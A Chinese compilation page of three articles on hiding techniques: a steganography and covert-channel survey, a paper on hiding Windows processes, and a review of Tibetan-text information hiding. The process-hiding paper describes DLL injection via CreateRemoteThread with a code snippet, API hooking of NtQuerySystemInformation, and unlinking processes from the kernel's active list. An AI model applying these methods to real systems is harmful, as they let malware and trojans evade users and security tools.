隐藏技术范文

时间:2023-03-10 10:28:27

隐藏技术

隐藏技术范文第1篇

信息隐藏技术可以追溯到远古时代,方法从音符、咒语到五花八门的隐写术,但隐写术发展一直比较缓慢,没有成为一门独立的学科,人们对于信息保密更多的是采用密码技术。直到信息技术和计算机技术高度发达的今天,数字化信息与隐写术相结合,为古老的隐写术注入了新的活力,使得数字化信息隐藏技术成为一门全新的技术,为探索非密码的通信安全提供了新途径。

1.信息隐藏的基本方式

1.1传输隐藏

在视频通信系统中隐藏信息,利用视频通信压缩编码中可利用的资源,在确保不使视频信号质量严重下降的前提下,嵌入压缩的话音编码,形成秘密通信信道。同时数据通信中的IP包和TCP包,均有未使用的保留空间,可用来传输隐藏信息。另外,IP包的时间戳也可传送1个比特的数据。

1.2载体隐藏

在文本文件、图像文件及可执行文件中插入秘密信息,可实现信息隐藏。利用话音信号的自然冗余性,将秘密信息直接编码到文件内容中去,或将其编码到文本格式中,形成以文本为载体的信息隐藏。将秘密信息插入图像文件中对人的视觉系统不敏感的比特位,在不影响图像质量的前提下实现信息隐藏。利用可执行文件中的冗余信息,加载秘密信息。

1.3存储隐藏

利用计算机系统中保留或未使用的空间保存秘密信息,为隐藏信息提供另外一种方式,通过创建隐藏分区、使用操作系统分配给文件但未使用的空间来隐藏信息。同一个计算机系统中不同安全级别的两台主机,根据预先约定的规则,通过存储特定数据也可传递信息。级别高的主机在特定区域存储不同大小、不同名称的文件,级别低的主机虽不能访问数据,但可从文件列表获取所要的信息。

2.信息隐藏的实现方法

2.1基于替换的信息隐藏方法

基于替换的信息隐藏,就是用秘密信息比特替换掉伪装载体中不重要的比特,实现对秘密信息的隐藏。如果这种嵌入的信息在传输过程中不被察觉,接收者就可从秘密信息嵌入的位置提取出秘密信息。常用的替换方法:一是最低比特位替换。就是利用图像位平面最低几位比特对人的视觉系统不敏感的特性,将这些比特替换成秘密信息的相应比特。利用此种方法可在伪装载体中隐藏大量秘密信息而不被察觉。二是伪随机置换。就是把秘密信息比特近似随机地分散在整个载体中。用伪随机数发生器产生索引序列,并在以此为索引的载体元素中插入秘密信息。利用此种方法插入比特的顺序无规律可找,因而增加了被攻击的复杂度。三是载体区域和奇偶校验位替换。将载体伪随机地分成若干个不相接的载体区域,在每个区域的奇偶校验位上嵌入一个信息比特,若奇偶校验位与信息比特不匹配,则区域中所有值最低一个比特位反转,使二者相等,在译码过程中计算出所有区域的奇偶校验位,排列起来重构信息。四是量化和抖动替换。利用数字图像的抖动和量化处理过程插入秘密信息。运用预测编码的量化误差,通过调整差分信号Δi来传送秘密信息。五是OSI网络协议帧结构替换。就是将秘密信息插入TCP/IP包中未使用的空间,形成一个秘密的通信信道。

2.2基于变换的信息隐藏方法

基于变换的信息隐藏,即使用离散余弦变换或小波变换在图像中嵌入信息,以获得更为健壮的隐藏信息。小波变换法是将所要传送的图像初始化(每个像素后R位置1),后经小波变换,分解成不同尺度空间、不同分辨率的一系列子图像,再对这些子图像进行适当量化、编码和加密隐藏处理,完成秘密信息的隐藏。回声隐藏法是一种有代表性的变换技术,即在离散信号f(t)中引入回声f(t-Δt) ,生成伪装信号c(t)=f(t)+af(t-Δt)来隐藏信息。利用回声信号延时Δt进行编码,发送Δt表示信号编码“0”,发送Δt’表示信号编码“1”。发送端将信号分成间隔大小不一的多个信号段,每一个信号段插入一个秘密比特,接收方通过同步措施重构信号段,并从伪装信号中提取秘密信息。

2.3基于扩频的信息隐藏方法

借鉴扩频通信技术原理,将信号调制到远远大于所需的带宽内传输,让信号淹没于信道噪声和热噪声之中,接收端采用相关检测法恢复出有用信号,滤除干扰信号,实现信息隐藏。由于这种方法占用频带很宽,所传输信号的信噪比(可以工作于负信噪比条件下)和功率谱密度都很小,因而很难被检测和干扰,具有很强的隐蔽性和较低的截获概率。

除此之外,基于统计知识的信息隐藏、基于变形技术的信息隐藏、基于神经网络的信息隐藏等许多信息隐藏方法尚在研究中。

3.信息隐藏技术对发展隐蔽通信的启示

信息隐藏技术与密码技术相比,在于它麻痹了攻击者的意志,使得秘密信息隐藏于信息海洋之中,从而获得意想不到的安全效果,受到人们越来越多的关注,同时也为隐蔽通信提供了一种思路,可以用在特殊情况下的最低限度通信。

3.1“隐话于数”

随着信息技术的迅速发展,数据通信业务增长较快。将秘密的话音业务隐藏于数据海洋中,不失为一种可取的方法。一是在发端采取特殊的话音编码技术,将编码后的话音编码插入数据文件中,替换数据文件中的冗余信息,如文本文件、图像文件等,接收端用特殊的解码设备将其还原出来。二是在基于以太网技术的数据包中插入编码后的秘密信息,如将其插入IP帧结构或TCP帧结构中保留的比特位,并以特定的记号标识数据包的顺序。三是将其插入噪声中。借鉴信息隐藏技术中量化和抖动替换技术,在有特殊需要的情况下,将秘密信息插入噪声中传送,用于特殊时期敏感信息的隐蔽传递。

3.2“隐秘于明”

隐藏技术范文第2篇

关键词:进程;隐藏

中图分类号:TP309文献标识码:A文章编号:1009-3044(2008)30-0740-02

Windows Process Hiding Method

SHI Yong-lin,PAN Jin,PANG Xiong-chang,XIE Qing-song

(Department one of Xi'an Communication Institute, Xi'an 710016,China)

Abstract: This paper gives a detail explanation of how to hide process on windows, it introduces three ways to achieve the goal.It also tell the strong and weak point of the different methods.

Key words: process;hiding

进程隐藏,也就在用户不知情的情况下,悄悄执行自己的代码。这一直是病毒、木马程序设计者不断探求的重要技术,因为这些程序都是见不得光的,都需要较好的隐藏和保护自己。了解进程隐藏技术,是开发防病毒和木马软件的基础,一般来讲,一个程序如果采用进程隐藏技术隐藏自己,那大多情况下其一定是一个病毒或木马等恶意程序。但有些情况下,进程隐藏也是某些类型程序所需要的功能,如某些安全控制程序,例如上网控制系统,其功能要求只能上单位局域网,不能上internet,这种程序需要常驻系统,不能停止和卸载,这则要求进程能有效保护和隐藏自己,以防止用户恶意删除和卸载。

进程隐藏是一个古老但一直成长的技术,一直以来隐藏和破解隐藏的斗争都在进行。从原理上讲任何隐藏进程因为其都不能从操作系统的进程调度链中删除,所以说都不能达到真正的隐藏,但是采用多种隐藏和保护机制,的确可以最大限度的保护程序。

进程隐藏现在主要有以下几种技术:

1) 利用CreateRemoteThread()函数和代码注入技术在宿主进程,如explorer中运行自己的代码。

2) 利用API拦截技术拦截NtQuerySystemInformation函数,过滤掉要隐藏的进程,因为windows任务管理器调用这个函数来获得系统运行的进程列表,这样在windows任务管理器中就隐藏了目标进程。

3) 把要隐藏的进程从系统活动进程列表(EPROCESS LIST_ENTRY)中摘除,这样其他的查找进程的函数都不能获取目标进程的信息了。

1 利用CreateRemoteThread进行进程隐藏

这种方法的主要原理是通过代码注入技术把代码注入到宿主进程中,然后通过调用CreateRemoteThread()函数在宿主进程中生成自己的线程,运行自己的代码。可以看出这种方法的一个主要工作是代码的注入,也就是怎样才能把自己的代码映射到宿主进程的空间中。

代码注入技术分为动态代码注入技术和静态代码注入技术,动态代码注入技术就是在进程启动后或在进程启动时在进程的运行空间中注入代码的技术,而静态注入技术就是在PE格式的.exe文件中插入代码。静态注入技术是病毒感染文件的常用方法,在文献[1]中有详细的叙述。动态注入技术也分为直接代码注入技术和以dll形式的注入技术,直接代码注入技术是利用VirtualAllocEx和CreateRemoteThread两个API来进行的函数级代码注入技术,可以采用汇编的形式,这种方法在文献[1]中的进程隐藏一章中有详细的讲解,也可以采用高级语言如c语言的形式,这种方法有兴趣的可以参考文献[2]。直接代码注入技术对注入的代码有很高的要求,要解决地址重定位等问题,而且注入代码的大小也受到很大的限制,所以不适用于进程级代码的注入。所以进程隐藏一般采用dll形式的动态代码注入技术。

利用CreateRemoteThread进行dll形式的动态代码注入技术在[3]中有较详细的论述。要在其他的进程中注入dll,就要求我们能在那个进程中调用LoadLibrary() API,但我们没有权限获得其他进程的执行控制权,幸好微软提供了函数CreateRemoteThread()可以在其他的进程中创建远程线程,而恰好线程函数的原型:

DWORD WINAPI ThreadProc(LPVOID lpParameter);

和LoadLibrary()的原型:

HMODULE WINAPI LoadLibrary(LPCTSTR lpFileName);

HMODULE和DWORD都是双字节,调用方式都是WINAPI,LPVOID和LPCTSTR都是双字节指针,所以函数原型是一样的。从而我们利用CreateRemoteThread()来欺骗操作系统,使其执行LoadLibrary() API,如下:

hThread = ::CreateRemoteThread(

hProcessForHooking, //要插入dll的进程句柄

NULL,

0,

pfnLoadLibrary,// LoadLibrary函数的地址

"C:\\HookTool.dll", //要注入的dll的全路径

0,

NULL);

LoadLibrary函数的地址因为其所在的Kernel32.DLL的映射地址在所有进程中是确定的,所以其值可以通过调用GetProcAddress()获得。

这种进程隐藏的方法要把进程执行的代码封装进dll中,这可能不能满足某些程序设计者的要求,而且经测试,瑞星等杀毒软件都禁止这种方法的代码注入,所以这种隐藏技术很难成功。

2 利用API拦截技术进行进程隐藏

API拦截的主要目的是在其他应用程序调用API之前将其拦截,由拦截者先处理传递的参数数据,然后决定是否再调用原来的API。比如API

BOOL TextOutA( HDC hdc, int nXStart,int nYStart,LPCTSTR lpString, int cbString);

在其他程序调用这个API之前,拦截程序可以先捕获这个调用,先对参数等进行处理,比如将cbString翻译为中文等,然后再调用原来的TextOutA进行文本输出,这样输出的文本就变成中文了。

因为任务管理器是调用ntdll.dll中的NtQuerySystemInformation()API来获得进程列表的,所以只要我们先截获这个调用,在我们的替换函数中先调用原来的NtQuerySystemInformation,从返回的进程信息链表中去除要隐藏的目标进程的信息,然后把改变的进程列表返回给任务管理器,那么目标进程则从任务管理器中隐藏。NtQuerySystemInformation函数的原形如下:

NTSTATUSNTAPI ZwQuerySystemInformation(

INULONGSystemInformationClass,

INPVOIDSystemInformation,

INULONGSystemInformationLength,

OUT PULONG ReturnLength

);

其中SystemInformation中返回的就是如下结构体构成的进程信息链表。

struct _SYSTEM_PROCESSES

{ULONGNextEntryDelta;

ULONGThreadCount;

......

UNICODE_STRING ProcessName;

KPRIORITYBasePriority;

ULONGProcessId;

......};

其中ProcessName指向的就是进程的可执行文件名,我们可以通过可执行文件名或进程ID ProcessId进行进程过滤。

从上面介绍可以看出,采用这种方法进行进程隐藏的关键是怎样进行API拦截,API拦截可以在用户层(ring3)进行,也可以在内核层(ring0)中进行。用户层的API拦截技术可以参考文献[4],这里详细介绍了用户层API拦截的各种技术。内核层的API拦截技术可以参考文献[5] 监控Native API调用一章,它的原理是通过替换windows系统服务描述符表中的Native API处理例程的入口地址来截获API。

这种技术可靠性好,容易实现,并且可以进行其他功能的隐藏,如注册表项隐藏,文件隐藏等,还可以通过截获进程控制API来防止杀死进程,所以可以更好的隐藏和保护进程,所以这种方法使用的较广泛。

3 修改系统活动进程列表

Window系统内部维护了一个活动进程链表,其节点结构体如下:

typedef struct _EPROCESS

{

/*000*/ KPROCESS Pcb;

/*06C*/ NTSTATUS ExitStatus;

/*070*/ KEVENT LockEvent;

/*080*/ DWORD LockCount;

/*084*/ DWORD d084;

/*088*/ LARGE_INTEGER CreateTime;

/*090*/ LARGE_INTEGER ExitTime;

/*098*/ PVOID LockOwner;

/*09C*/ DWORD UniqueProcessId;

/*0A0*/ LIST_ENTRY ActiveProcessLinks;

......

} EPROCESS;

typedef struct _LIST_ENTRY

{

struct _LIST_ENTRY *Flink;

struct _LIST_ENTRY *Blink;

} LIST_ENTRY;

系统通过查找这个链表获得系统中进程的列表,所以如果把要隐藏的进程从这个链表中去除,则可以从系统中隐藏此进程.查找可以通过进程ID UniqueProcessId进行。

这种方法也是既可以在内核中进行,也可以在应用层进行。

(下转第744页)

(上接第741页)

在内核层采用这种方法隐藏进程比较简单,这个链表的表头存储在系统变量PsActiveProcessHead中,但这个变量windows没有输出,但我们可以通过PsGetCurrentProcess()函数获取当前进程的EPROCESS结构体指针,然后通过ActiveProcessLinks遍历列表来查找要隐藏的进程。这里需要注意的是不同版本的windows系统的EPROCESS结构可能不同。

在用户层采用这种方法的原理也很简单,因为windows系统在物理内存中的位置是固定的,所以活动进程链表的首地址也是固定的,通过调用ZwOpenSection()函数读取和修改物理内存,然后修改的链表的相应位置来去除目标进程。在用户层采用这种方法隐藏进程可靠性较差,因为和windows系统的版本关系太密切,不同windows版本中的很多参数都不同,如链表头的位置,window内存的映像等,所以需要修改程序的很多参数,而且很多杀毒软件都禁止对物理内存的直接读写,所以很多情况下都不能达到对进程的隐藏。

4 总结

本文从原理上介绍了进程隐藏的几种方法,其中比较可靠和常用的是利用API拦截技术和在内核层修改活动进程链表两种方法。就像在本文开始所讲到的一样,隐藏都是相对的,只要进程还在系统中运行,就必须服从windows的调度,那么其在系统中就一定可以查找得到,所以一些系统工具,如IceSword等就可以查找到隐藏的进程,但我们可以采用多种技术的复合,如三线程进程保护机制,文件隐藏机制等,增加进程的防杀功能,可以从一定程度上保护进程。

参考文献:

[1] 罗云彬.Windows环境下32位汇编语言程序设计[M].电子工业出版社,200,10.

[2] Ciro Sisman Pereira.Portable Executable (P.E.) Code Injection: Injecting an Entire C[DB/OL].

[3] Jeffrey Ritcher.Load Your 32-bit DLL into Another Process's Address Space Using INJLIB[J].MSJ May 1994.

[4] 史永林.Windows API拦截技术[J].电脑知识与技术 2008,3(9):

[5] Sven Schreiber.Undocumented Windows 2000 Secrets[M].

隐藏技术范文第3篇

关键词:藏文传输;信息隐藏;秘密信息共享;信息安全

中图分类号:TN401 文献标识码:A 文章编号:2095-1302(2014)12-00-05

0 引 言

安全、有效的信息传输对国家安全、社会稳定和人民安居乐业至关重要。网络和多媒体技术的发展,使得信息传输的速度和数量正以惊人的增量发展。然而,信息传输的便利在方便人们的同时也给信息安全带来了隐患,同时也为基于数字载体的秘密信息传输提供了广阔的研究空间。目前,基于载体的秘密信息传输是信息安全领域的一个方兴未艾的研究热点。而基于载体预处理的藏文信息隐藏技术将为信息安全领域提供一些新的数字信息共享和传输理念,特别是藏文的预处理规律、在数字信息中的隐藏规律等,将有助于涉藏秘密通信技术的发展,并可以对民用和商用领域中涉及到藏文内容的传输、共享、存储和提取的通信过程起到安全保护、版权保护及完整性认证的作用,并对国家涉藏领域的网络舆情监控、国内外涉藏敏感信息标注和情感色彩认知起着至关重要的作用。

在藏文信息隐藏技术方面,目前主要涉及的技术有关键字识别、字符识别和提取、韵律认知、语义角色标注、文本资源挖掘和语料抽取等,并以此为基础进行置乱优化。

1 国内外信息隐藏技术研究现状

信息隐藏一直是信息安全领域中保障隐秘信息安全传输和数字信息版权的重要手段,也是近年来国内外学者研究的热点之一。最新的一届ACM信息隐藏和多媒体安全会议(ACM IH&MMSec’13 Workshop)的主要研究内容有信息隐藏算法、多媒体水印和认证、载体运算域的数字信号处理等。其中,信息隐藏算法的设计首先依赖于载体的选择和预处理;关于多媒体水印和认证的研究则将信息隐藏和数字水印的载体范围从数字图像等常见载体拓展到了包括三维模型在内的新型载体上;载体运算域的数字信号处理涉及到了载体预处理时所用的具体方法,如空间域或变换域等。2013年IEEE 图像处理国际会议(IEEE ICIP 2013)的主要研究内容包括图像、音视频和3-D等多媒体的信息隐藏算法和多媒体特征提取和分析等,这两类研究内容均与载体的选取和预处理有关。最新一届信息隐藏国际会议(IH2012)的主要研究内容包括多媒体安全和其他载体的信息隐藏。我国的第十一届全国信息隐藏暨多媒体安全学术大会(CIHW2013)中关于信息隐藏算法的研究内容也主要集中在非常规载体的分析和预处理上。

藏文作为信息隐藏领域一种新的信息格式,对其研究主要局限于藏文操作系统、藏文信息技术标准、藏文信息处理等几个方面[1],具体内容集中在藏文编码字符集、术语集、拼音辅助集等的建立。

基于载体的秘密通信技术是20世纪90年代中期发展起来的跨领域的学科,而载体的预处理技术一直是其研究的主要方向。对隐藏载体进行预处理,生成信息隐藏嵌入区域是信息隐藏算法中最重要的研究内容之一。从上述国内外各学术会议中关于信息隐藏的参会论文和研讨情况看,各类载体固有特性的研究对预处理技术有着重要的意义,且数字图像依然是主要的一类载体,而三维模型将是未来主要研究的一类非常规载体。下面就对数字图像和三维模型两类载体的预处理技术的研究现状进行阐述。

1.1 数字图像预处理技术研究综述

基于数字图像的信息隐藏技术是信息隐藏学科中重要的技术分支,是目前应用最广、覆盖范围最大的信息隐藏技术手段。在基于数字图像的信息隐藏技术研究中,信息隐藏区域的生成是关系算法性能的重要因素。信息隐藏区域的生成方法主要包括空间域生成法、变换域生成法以及空间域和变换域联合的生成方法。

空间域算法:作为空间域算法中出现最早、操作最简单且应用最广泛的算法,基于位平面分解理论的LSB算法可以直接替换的方式隐藏较大的数据量,刘红翼等提出的一种LSB算法具有容量大、运算量小的特点[2];刘文彬等提出的LSB隐写替换的消息定位方法则可以对此类算法进行检测[3];而IH2012的论文中,有学者运用假设检验理论和含秘载体的奇偶感知特性可有效地检测LSB算法所隐藏的隐秘信息[4,5],这些研究为藏文信息隐藏中涉及到关于此类算法的抗检测性研究提供了新的待改进方向。张焱等提出的像素值排序和赵彦涛等提出的直方图修改等空间域算法在沿用LSB直接替换的隐藏理念的同时,还提升了鲁棒性,因此也被广泛用于数字图像载体预处理[6,7];随后,杨春芳等提出了针对此类算法的检测方法[8],这也为针对此类算法抗检测性改进的研究提供了重要依据。此外,上述同类算法中的载体子区域划分思想、内容自适应思想等也对本项目基于载体结构特性建立空间匹配模型的机制提供了方法学上的有力支持[9-13]。

变换域算法:不同于空间域算法直接对载体的空间特性进行修改,变换域预处理方法以修改载体的频率参数来隐藏信息[14],因此算法的鲁棒性比空间域算法好。在此基础上,唐燕等又对隐秘信息的检测和恢复进行了研究和改进,实现了几乎无需原始参量的半盲提取[15]。尽管变换域算法不具备空间域算法容量大、运算量小和易操作等优势,但是变换域中的多小波理论因其同时具有对称性、短支撑性、二阶消失矩和正交性等特性成为了信号处理中有明显优势且较常用的方法,在前期研究中利用多小波方法将数字图像载体分块后作为嵌入区域,提高了算法的鲁棒性和不可见性[16,17],这种方法为在藏文信息隐藏研究中建立基于区域能量的阶梯性分布机制提供了一种研究手段。

混合域算法:较单独运用一种空间域或变换域生成隐藏区域并设计信息隐藏算法来看,基于空间域与变换域联合的信息隐藏算法可以兼有多种算法的性能优势。在基于空间域和变换域联合的信息隐藏算法中,空间域的作用体现在数据嵌入的具体操作方面,因为隐藏的实质就是在当前环境下的空间分量上进行数据修改,利用边缘像素值差分(Edged Pixel Value Differencing,EPVD)将载体换算为若干个像素块,以最大斜角的数据修改作为信息隐藏的具体方法[18];利用湿纸码和基于LSBM的双层隐写来对载体进行加1嵌入或减1嵌入[19];另外,国内外许多学者利用调色板理论进行数据嵌入[20,21]。而变换域在载体预处理中的主要作用是生成满足特定需要的信息隐藏环境(区域),主要包括变换后的系数分布以及n阶分量子图等。如对RSV颜色空间的V分量做DCT变换,分块后作为嵌入区域[22];利用视觉显著点技术确定跟踪窗(Regions of Interest,ROI),在ROI的DCT系数上嵌入隐藏信息,并指定某个ROI边缘地图脆弱性标识,嵌入到DWT变换后的含密图像中[23];前期研究中,研究人员利用自适应颜色迁移理论中lαβ域对颜色的控制力,消除了RGB颜色分量的强相关性,并结合GHM能量分区隐藏信息,在不可见性、嵌入信息量和鲁棒性方面均具有较好的表现[24]。

1.2 三维模型预处理技术研究综述

潘志庚等将基于三维模型的信息隐藏预处理方法主要分为空间域算法和变换域算法[25]。这也这为藏文信息隐藏研究提供了新的思路和方法。

空间域算法:空间域算法通常具有易嵌入和盲提取的特点,如直接置换载体的几何信息来隐藏数据是三维模型载体信息隐藏最原始、最直接的方法[26]。为改进此类算法的鲁棒性,引入仿射不变量是有效的措施,如利用具有连续解析性的仿射不变量优化需要置换的顶点[27]、 将稳态锚点通过三角垂心编码解析为聚类元素从而嵌入隐秘信息[28]。此外,基于主元分析的算法也有助于改善空间域算法的鲁棒性,例如可根据主元分析(Primary Component Analysis,PCA)来确定模型的关键位置作为鲁棒区域,并用网格分割法改进鲁棒性和不可见性[29-32]。这类算法也为藏文信息隐藏从载体结构特性进行解析和预处理提供了理论依据。改进型的空间域算法多针对鲁棒性或容量性有所提升,如基于连续解析性的体积矩的盲算法,改善了之前算法对连通性攻击的鲁棒性[33];通过重排顶点和面片在网格文件中的表示信息,利用表示域内的信息进行嵌入使算法具有良好的不可见性和大容量性[34],但对相似变换以外的攻击不具有鲁棒性。

变换域算法:三维模型预处理的变换域方法大多利用频谱分析将模型信息参数化[35],对参数进行少量修改后以隐藏信息,其中,基于小波变换的算法可以对规则和非规则网格模型进行小波域参量修改以嵌入较多信息[36]。理论上,变换域算法比空间域算法鲁棒性强,但由于三维模型顶点的天然无序性和不规则性,对其进行频谱分析难度大,导致变换域算法实用性目前较低,因此空间域算法依然是比变换域算法更有实用价值的研究方向[37]。

2 藏文信息隐藏技术研究现状

目前反映藏文信息处理技术最新进展的文献较少,综合以已有的研究成果及相关研究文献,藏文信息处理可划分为藏语信息处理和藏字信息处理两个层次[38,39]。藏语信息处理包括机器翻译、信息检索、信息提取、文本校对、文本生成、文本分类、自动摘要以及藏文字识别和语音识别的后处理等等;而藏字信息处理包括操作系统以及编码字符集、输入技术、字形描述与生成、存储、编辑、排版、字频统计和藏字属性库等。这些研究基础对藏文信息隐藏技术的发展至关重要,是基于载体预处理的藏文信息隐藏的主要技术来源。鉴于藏文的独特构造,以及藏文的特点,目前对藏文秘密信息的预处理技术一般指置乱和加密算法的选择[40],而置乱使信息变得杂乱无章难以辨认,可以起到加密与改变信息嵌入特性的作用。可用于藏文信息隐藏的置乱算法主要有Arnold变换、幻方矩阵、Gray码变换、混沌序列等方法[41]。其中,Arnold变换算法简单且置乱效果显著,使有意义的数字图像变成像白噪声一样的无意义图像,实现了信息的初步加密和信息结构的调整,在嵌入信息为数字图像时可以很好的应用[42]。幻方置乱的思想基于查表思想,基于数字图像的幻方置乱可降低幻方置乱阶数或以图像块进行置乱,实现置乱效果与系统开销的平衡[43]。Gray是一种具有反射特性和循环特性的单步自补码,它的循环、单步特性消除了随机取数时出现重大误差的可能,它的反射、自补特性使得求反非常方便[44]。混沌的优势在于对初始条件的极端敏感和轨迹在整个空间上的遍历性。根据经典的Shannon置乱与扩散的要求,这些独特的特征使得混沌映射成为信息隐藏嵌入算法的优秀候选[45]。上述传统的置乱算法一般用于正方形图像处理,而经过改进的Arnold算法可直接用于宽高不等的矩形图像而不必进行正方形扩展[46],这也将是藏文信息隐藏技术所采用的主要置乱方法之一。

3 藏文信息隐藏技术的研究目标、研究内容和要解决的问题

3.1 研究目标

面向藏文安全通信的高性能信息隐藏算法是目前藏文信息隐藏技术的主要目标,包括提出性能出色的、适合藏文通信要求的信息隐藏算法;提出一种具有普适性的高性能信息隐藏嵌入区域生成原则和嵌入规则:

(1) 基于数字图像的藏文信息隐藏算法:提出至少两种基于数字图像的藏文信息隐藏算法,算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(PSNR≥34.90dB)、强鲁棒性(抗击大约69%以下的JPEG2000压缩、35%以下的剪切及常见滤波与加噪)、大容量性(基于彩色图像的信息隐藏信息嵌入率≥18%)以及高感知篡改性(检测隐藏数据是否被篡改能力≥95%)。

(2) 基于三维模型的藏文信息隐藏算法:提出至少一种基于三维模型的藏文信息隐藏算法。算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(RSNR≥69.94dB、En≥70%)、应对一般攻击的强鲁棒性(抗击大约0.10%随机加噪、50-times Laplacian平滑、50%均匀重网格化以及均匀简化等)、大容量性(相对理想的RSNR,嵌入率≥29%)以及低复杂度(根据载体模型几何信息量而变化)。

(3) 普适性信息隐藏嵌入区域生成原则和嵌入规则:利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则,将适应于所有对数字图像处理后有能量区别的图像处理方法,指导设计者利用能量与鲁棒性、复杂度与不可见性的对应关系,研究出同时满足不可见性和鲁棒性的信息隐藏算法。

3.2 研究内容

(1) 藏文信息隐藏区域生成原则与规则研究:数字图像信息隐藏技术的研究核心集中在隐藏区域和嵌入规则的设计上,藏文信息隐藏算法的设计方法和思路就是在选定藏文信息隐藏区域以及制定好信息隐藏规则后,按照一定的顺序将两者进行合理的组织,所以研究藏文信息隐藏区域生成原则以及信息隐藏规则是重点。

(2) 基于数字图像的藏文信息隐藏算法研究:隐藏算法是基于数字图像的信息隐藏技术的研究核心,需按照嵌入域进行划分,对基于空间域和基于变换域的信息隐藏算法分别进行研究,提出单独基于空间域、单独基于变换域以及两者联合应用的数字图像信息隐藏算法。

(3) 基于三维模型的藏文信息隐藏算法研究:首先对三维模型的结构特性和能量特性进行研究,再根据载体模型的特性找出对应的预处理方法。在研究基于空间域和基于变换域的信息隐藏算法的基础上,提出改进型的三维模型信息隐藏算法。主要用于提升载体有效嵌入容量和降低载体视觉失真度。

(4) 载体与藏文秘密信息的一致化方法研究:基于上述研究基础,生成结构和能量差异化子区域,再将藏文秘密信息按照拼音属性进行解析生成信息序列。再利用优化算法使得预处理后的载体信息和藏文秘密信息的解析编码获得最大一致化,从而提高算法性能。

3.3 需解决的关键问题

综合已有的研究,在藏文信息隐藏技术方面,目前需要解决的问题有以下几个方面:

(1) 信息隐藏区域与嵌入规则设计:在具有什么性质的区域内应用什么样的规则进行藏文信息隐藏才可以解决“不可见性与鲁棒性的对立、容量性与抗分析性的对立”问题,是藏文信息隐藏研究领域的关键技术之一。需找出隐藏区域的性质与信息隐藏性能的关系,提出面向藏文信息传输的信息隐藏区域选择的原则与方法;给出在具有具体性质的嵌入区域中的藏文信息隐藏嵌入规则的制定原理和方法;提出大量的藏文信息数据转换思想与方法,以提供形式多样的信息隐藏嵌入规则。

(2) 数字图像载体预处理方法:①多小波理论在载体预处理中的应用。对于数字图像经过多小波变换后所具有的特殊性质,找出多小波变换后数字图像所具有的能量特性与基于数字图像信息隐藏算法性能之间所遵循的规律已有学者进行研究。②颜色空间的性能分析与应用选取。RGB、CMYK、lαβ、YUV以及HSx颜色空间,应用方法以及应用各有优劣势。该技术的应用难点在于为颜色空间在藏文信息隐藏的应用提出完备的应用方案,因为这些颜色空间在藏文信息隐藏技术中的应用目前非常少,应用优劣还处于实验验证阶段,没有理论验证的支持。

(3) 三维网格模型载体预处理方法:骨架抽取和内切球解析技术在藏文信息隐藏算法中的应用。这种方法不涉及顶点数量及坐标的改变和拓扑关系的修改。难点在于寻找一个理想的仿射不变量作为辅助参数以弥补算法对缩放攻击的脆弱性。

(4) 藏文的置乱与遗传优化算法:有的藏文字处理系统把藏文看成是由30个辅音、4个元音、3个上加字、5个下加字共42个藏文字符组成的,而有的则认为由其他数量的字符组成。基于对藏文中加字对发音的影响规律的研究,利用字符与二进制码的解析规则和置乱与优化技术对信息置乱,达到隐藏信息与载体信息的最大匹配度也是一个技术难点。

4 藏文信息隐藏技术研究的新方法

(1)利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则。高能量与强鲁棒、高复杂度与高不可见性的对应关系,从根本上解决藏文信息隐藏算法中不可见性和鲁棒性的对立问题,为面向藏文通信安全的信息隐藏算法的设计给出一种普适性方法。

(2)根据数字图像信息隐藏嵌入区域的生成原则和嵌入规则,提出新的、高性能的数字图像的藏文信息隐藏算法。算法利用lαβ等颜色空间转换以及多小波对载体图像进行的处理,生成具有不同能量特性的嵌入区域,从频率域上满足藏文信息隐藏的应用要求;通过对载体图像进行颜色迁移、矢量解析以及环形处理,从数字图像的空间结构上满足藏文信息隐藏的应用要求。

(3)提出满足三维模型结构特性和能量特性的藏文信息隐藏算法。算法利用局部高度理论和均值偏移理论对载体模型进行预处理,生成具有不同能量特性的嵌入区域,从频域上满足信息隐藏的应用要求;通过对载体图像进行骨架抽取、内切球解析,从空间结构上满足藏文信息隐藏的应用要求。

参考文献

[1]陈玉忠,俞士汶. 藏文信息处理技术的研究现状与展望[J]. 中国藏学. 2003(4):97-107.

[2]刘红翼,王继军,韦月琼,等.一种基于LSB的数字图像信息隐藏算法[J].计算机科学,2008, 35(1):100-102.

[3]刘文彬,刘九芬.一种针对LSB替换隐写的消息定位方法[J].信息工程大学学报,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 张焱,张敏情,瓮佳佳.基于直方图对的大容量信息隐藏算法[J].计算机应用研究,2013,30(7):2108-2111.

[7] 赵彦涛,李志全,董宇青.基于排序和直方图修改的可逆信息隐藏方法[J].光电子.激光,2010,2(1):102-106.

[8] 杨春芳,刘粉林,罗向阳.基于相对熵的直方图差异与JPEG隐写的定量分析[J].计算机研究与发展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方图平移的彩色图像可逆信息隐藏[J].四川大学学报,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和红杰,张家树.对水印信息篡改鲁棒的自嵌入水印算法[J].软件学报,2009,20(2):437-450.

[15] 唐燕,闾国年,殷奎喜.规范类正交矩阵的信息隐藏算法[J].东南大学学报,2013,43(1):45-49.

